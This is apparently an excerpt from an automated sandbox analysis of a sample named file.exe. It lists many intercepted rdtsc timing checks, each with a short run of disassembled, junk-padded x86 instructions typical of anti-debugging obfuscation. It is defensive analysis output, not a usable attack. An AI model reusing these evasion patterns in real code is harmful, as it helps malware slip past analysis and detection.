    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8457 second address: DC8460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8460 second address: DC8468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8468 second address: DC846C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC89FE second address: DC8A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8A04 second address: DC8A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pushad 0x00000007 jng 00007F9F2573ED1Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F9F2573ED16h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8A23 second address: DC8A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8A27 second address: DC8A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jg 00007F9F2573ED16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8E3F second address: DC8E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007F9F24D1BA76h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8E4E second address: DC8E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push edi 0x00000008 jmp 00007F9F2573ED1Eh 0x0000000d jmp 00007F9F2573ED28h 0x00000012 pop edi 0x00000013 popad 0x00000014 push edi 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8FF8 second address: DC8FFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC8FFE second address: DC901A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9F2573ED21h 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9154 second address: DC9158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC951D second address: DC9521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC9521 second address: DC9532 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jno 00007F9F24D1BA76h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCDAD8 second address: DCDADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE079 second address: DCE096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F24D1BA88h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE223 second address: DCE227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE227 second address: DCE23A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9F24D1BA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007F9F24D1BA76h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE23A second address: DCE24D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jl 00007F9F2573ED18h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE24D second address: DCE257 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9F24D1BA76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCE907 second address: DCE90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D7F8D8 second address: D7F8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEDA0 second address: DCEDAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jo 00007F9F2573ED16h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEDAC second address: DCEDB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEDB0 second address: DCEDC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9F2573ED16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F9F2573ED16h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DCEDC6 second address: DCEDCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD340A second address: DD3423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9F2573ED16h 0x0000000a jmp 00007F9F2573ED1Eh 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2BAF second address: DA2BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2C5C second address: DA2C60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2C60 second address: DA2C66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2C66 second address: DA2C6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2C6C second address: DA2C70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2C70 second address: BF38EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+12470F26h], ecx 0x00000011 push eax 0x00000012 xor dword ptr [ebp+122D2067h], ebx 0x00000018 pop edi 0x00000019 push dword ptr [ebp+122D0E51h] 0x0000001f mov dword ptr [ebp+122D1F26h], ebx 0x00000025 call dword ptr [ebp+122D2815h] 0x0000002b pushad 0x0000002c jc 00007F9F2573ED29h 0x00000032 jmp 00007F9F2573ED23h 0x00000037 xor eax, eax 0x00000039 clc 0x0000003a mov edx, dword ptr [esp+28h] 0x0000003e jmp 00007F9F2573ED24h 0x00000043 add dword ptr [ebp+122D1943h], ebx 0x00000049 mov dword ptr [ebp+122D34CEh], eax 0x0000004f jmp 00007F9F2573ED20h 0x00000054 mov esi, 0000003Ch 0x00000059 jl 00007F9F2573ED2Fh 0x0000005f pushad 0x00000060 jmp 00007F9F2573ED21h 0x00000065 xor dword ptr [ebp+122D1943h], ecx 0x0000006b popad 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 jmp 00007F9F2573ED28h 0x00000075 lodsw 0x00000077 add dword ptr [ebp+122D1943h], ecx 0x0000007d jng 00007F9F2573ED24h 0x00000083 pushad 0x00000084 mov eax, dword ptr [ebp+122D34FAh] 0x0000008a jng 00007F9F2573ED16h 0x00000090 popad 0x00000091 add eax, dword ptr [esp+24h] 0x00000095 jmp 00007F9F2573ED1Bh 0x0000009a mov ebx, dword ptr [esp+24h] 0x0000009e jno 00007F9F2573ED22h 0x000000a4 push eax 0x000000a5 push edx 0x000000a6 pushad 0x000000a7 push eax 0x000000a8 push edx 0x000000a9 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2CF1 second address: DA2CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2CF6 second address: DA2D23 instructions: 0x00000000 rdtsc 0x00000002 js 00007F9F2573ED2Eh 0x00000008 jmp 00007F9F2573ED28h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 jnc 00007F9F2573ED16h 0x00000019 pop edi 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2D23 second address: DA2D5C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9F24D1BA78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F9F24D1BA84h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007F9F24D1BA7Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d jnp 00007F9F24D1BA76h 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA2EBA second address: DA2EED instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9F2573ED16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F9F2573ED1Dh 0x00000012 jnc 00007F9F2573ED18h 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a and di, F944h 0x0000001f mov di, C129h 0x00000023 push eax 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3235 second address: DA325F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F9F24D1BA7Ch 0x00000008 jnc 00007F9F24D1BA76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F9F24D1BA87h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA38DD second address: DA38FE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9F2573ED1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007F9F2573ED16h 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA38FE second address: DA391F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F9F24D1BA7Ch 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push esi 0x00000016 pop esi 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA391F second address: DA3929 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9F2573ED1Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3A12 second address: DA3A47 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9F24D1BA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jg 00007F9F24D1BA76h 0x00000011 pop eax 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 pushad 0x00000017 mov dword ptr [ebp+122D20DDh], edx 0x0000001d popad 0x0000001e lea eax, dword ptr [ebp+124824C8h] 0x00000024 mov ecx, dword ptr [ebp+122D2867h] 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jne 00007F9F24D1BA76h 0x00000035 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3A47 second address: DA3A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F2573ED26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA3A61 second address: D7F8D8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 js 00007F9F24D1BA80h 0x0000000f pushad 0x00000010 jl 00007F9F24D1BA76h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 nop 0x0000001a jmp 00007F9F24D1BA7Ah 0x0000001f call dword ptr [ebp+122D2F92h] 0x00000025 push ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD39C4 second address: DD39E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F9F2573ED1Dh 0x0000000a je 00007F9F2573ED18h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3B9B second address: DD3BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3BA1 second address: DD3BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F9F2573ED16h 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3BB1 second address: DD3BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3BB6 second address: DD3BBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3BBC second address: DD3BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3D19 second address: DD3D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD3D1D second address: DD3D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD78F5 second address: DD78FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9F2573ED16h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDB97A second address: DDB97E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDB97E second address: DDB9A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F2573ED23h 0x00000007 jmp 00007F9F2573ED1Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDFDD5 second address: DDFDEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F9F24D1BA76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007F9F24D1BA76h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDFDEA second address: DDFE0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F9F2573ED28h 0x0000000e jmp 00007F9F2573ED22h 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDFE0F second address: DDFE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F24D1BA88h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE03C3 second address: DE03DB instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9F2573ED16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F9F2573ED1Ch 0x00000010 pop eax 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE03DB second address: DE040C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F24D1BA81h 0x00000007 push eax 0x00000008 jmp 00007F9F24D1BA86h 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE040C second address: DE0412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0412 second address: DE0420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F9F24D1BA76h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE0420 second address: DE042D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F9F2573ED16h 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE042D second address: DE043B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F9F24D1BA7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3D7D second address: DE3D87 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9F2573ED16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE3D87 second address: DE3D92 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F9F24D1BA76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6F3F second address: DE6F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F9F2573ED16h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6AFE second address: DE6B07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6B07 second address: DE6B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6B0D second address: DE6B1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jo 00007F9F24D1BA76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6C9F second address: DE6CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F9F2573ED16h 0x0000000a popad 0x0000000b jc 00007F9F2573ED1Eh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB082 second address: DEB0A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pop edx 0x0000000c jmp 00007F9F24D1BA84h 0x00000011 pop eax 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB0A3 second address: DEB0B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F9F2573ED16h 0x0000000a jmp 00007F9F2573ED1Ch 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB0B9 second address: DEB0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB1F7 second address: DEB20A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F9F2573ED22h 0x0000000b jbe 00007F9F2573ED16h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEB4DC second address: DEB4E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEE66D second address: DEE6A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F9F2573ED28h 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F9F2573ED22h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEDE54 second address: DEDE68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F9F24D1BA7Eh 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4D11 second address: DF4D38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F9F2573ED16h 0x0000000a pushad 0x0000000b popad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F9F2573ED25h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4D38 second address: DF4D4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 jmp 00007F9F24D1BA7Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5131 second address: DF513B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF513B second address: DF5163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F24D1BA81h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9F24D1BA7Dh 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF52E7 second address: DF52ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5E86 second address: DF5E8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFDA19 second address: DFDA36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F2573ED29h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFE515 second address: DFE51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFE51B second address: DFE51F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFE51F second address: DFE523 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
